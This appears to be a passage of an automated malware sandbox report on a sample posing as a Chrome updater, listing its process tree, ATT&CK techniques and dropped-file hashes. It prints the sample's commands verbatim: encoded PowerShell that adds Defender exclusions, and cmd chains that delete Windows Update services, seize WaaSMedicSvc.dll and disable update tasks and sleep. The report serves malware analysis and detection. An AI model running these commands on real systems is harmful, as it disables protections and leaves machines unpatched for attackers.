C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵PID:2600
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "ofrnufvwokgx"3⤵
- Loads dropped DLL
PID:2028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAcwBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZgByAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcAB2AGcAIwA+AA=="4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵PID:2976
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:2268
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:2020
-
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:2500
-
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
PID:2012
-
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
PID:2348
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
PID:2112
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
PID:280
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f6⤵
- Modifies registry key
PID:2540
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f6⤵
- Modifies registry key
PID:2404
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f6⤵
- Modifies registry key
PID:2952
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2908
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵
- Modifies registry key
PID:1520
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵
- Modifies registry key
PID:2224
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
PID:2568
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
PID:1668
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE6⤵PID:2056
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE6⤵PID:2716
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE6⤵PID:2980
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE6⤵PID:2040
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE6⤵PID:1996
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE6⤵PID:1812
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵PID:1060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵PID:2732
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
293KB
MD57a2d5deab61f043394a510f4e2c0866f
SHA1ca16110c9cf6522cd7bea32895fd0f697442849b
SHA25675db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69
SHA512b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0
-
Filesize
293KB
MD57a2d5deab61f043394a510f4e2c0866f
SHA1ca16110c9cf6522cd7bea32895fd0f697442849b
SHA25675db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69
SHA512b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0
-
Filesize
448KB
MD56d1c62ec1c2ef722f49b2d8dd4a4df16
SHA11bb08a979b7987bc7736a8cfa4779383cb0ecfa6
SHA25600da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c
SHA512c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2
-
Filesize
448KB
MD56d1c62ec1c2ef722f49b2d8dd4a4df16
SHA11bb08a979b7987bc7736a8cfa4779383cb0ecfa6
SHA25600da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c
SHA512c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2
-
Filesize
4.1MB
MD550bfdd2eb713e8b5ef0899848159542e
SHA1df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA2561388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
4.1MB
MD550bfdd2eb713e8b5ef0899848159542e
SHA1df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA2561388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
4.1MB
MD550bfdd2eb713e8b5ef0899848159542e
SHA1df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA2561388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
4.1MB
MD550bfdd2eb713e8b5ef0899848159542e
SHA1df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA2561388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
310KB
MD57b8fcb29905e045b7f8c1dc9bc305698
SHA11f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA25670eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2
-
Filesize
310KB
MD57b8fcb29905e045b7f8c1dc9bc305698
SHA11f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA25670eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2
-
Filesize
4.1MB
MD550bfdd2eb713e8b5ef0899848159542e
SHA1df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA2561388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
4.1MB
MD550bfdd2eb713e8b5ef0899848159542e
SHA1df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA2561388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
244B
MD5e87b986da2d91d9cc2203e6f12bdb13d
SHA1729e54e08a5cc0784f4d90220a8a1298a6410145
SHA25644eeec4e1ef502fe97433d8588b09fc2e05d65079a3d1f3e071cbd1ae645cf56
SHA5126c5bf1a7c2290a0890534697ad41de4b5ee2821047c328fe279ef580a986ad67821493a15c0f18b6c012e852f34f4f42717c9181bffa12d8328100c90ccfac79
-
Filesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\07CGK9RARWSQRHXDB2S5.temp
Filesize7KB
MD5d0bf3f094fc677a52e2f7f063edf2c85
SHA1df3b4123b6e90b681c3cf0f30ef496ce86787aac
SHA25647c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4
SHA512a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d0bf3f094fc677a52e2f7f063edf2c85
SHA1df3b4123b6e90b681c3cf0f30ef496ce86787aac
SHA25647c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4
SHA512a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD534dc4454196f0ad68db18c132e5e281c
SHA1b0ce0637ccbe63c97177fa298098deb9a1207d91
SHA2568ef8c0b7fcfe8ec307019ea0de462a7004de826415a941f9124fabed3a1a8995
SHA51265cc1698795f46c1bdf3d70110932159e37ed363514b82b137b4ef0022f84fb7566f1c88014d61982f2b4a7cae4ae35fa8a8ac12fb4dcd3b28ef8f60709a27a8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d0bf3f094fc677a52e2f7f063edf2c85
SHA1df3b4123b6e90b681c3cf0f30ef496ce86787aac
SHA25647c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4
SHA512a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d
-
Filesize
4.1MB
MD550bfdd2eb713e8b5ef0899848159542e
SHA1df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA2561388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
4.1MB
MD550bfdd2eb713e8b5ef0899848159542e
SHA1df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA2561388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc
-
Filesize
310KB
MD57b8fcb29905e045b7f8c1dc9bc305698
SHA11f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA25670eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2
-
Filesize
4.1MB
MD550bfdd2eb713e8b5ef0899848159542e
SHA1df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA2561388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc